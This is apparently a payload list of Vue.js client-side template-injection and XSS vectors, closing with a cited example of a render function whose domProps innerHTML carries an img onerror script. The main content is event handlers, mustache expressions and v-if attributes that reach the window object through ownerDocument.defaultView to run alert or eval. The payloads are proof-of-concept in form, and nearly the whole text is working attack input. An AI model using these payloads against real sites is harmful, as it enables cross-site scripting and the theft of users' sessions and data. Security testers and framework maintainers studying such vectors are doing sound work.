@click="$event.target.ownerDocument.defaultView.alert(1)"
<p>{{this.$el.ownerDocument.defaultView.alert(1)}}</p>
<script>
new Vue({
el: "#content",
data: {
raw: "<s>deleted</s>"
}
});
</script>
<div id="content"><span> v-html="raw"></span></div>
<img src=x @error="$event.target.ownerDocument.defaultView.alert(1)">
<img v-if="1)])+this.$el.ownerDocument.defaultView.eval('console.log(1)');}//">
<img v-if="1)+this.$el.ownerDocument.defaultView.alert(1)+(1">
<img v-if="this.$el.ownerDocument.defaultView.alert(1)">
<p>{{this.$el.ownerDocument.defaultView.alert(1}}</p>
<script>new Vue({el: \"#content\",data: {raw: \"<s>deleted</s>\"}});</script><div id=\"content\"><span> v-html=\"raw\"></span></div>
// https://blog.ssrf.in/post/modern-javascript-framework-xss/
// createElement に 任意のprops が入る場合
const props = JSON.parse('{"domProps": { "innerHTML": "<img src=\'x\' onerror=\'alert(1)\'>" }}')
let anchoredHeading = Vue.component('anchored-heading', {
render: function (createElement) {
return createElement('h1', props, 'hoge')
},
})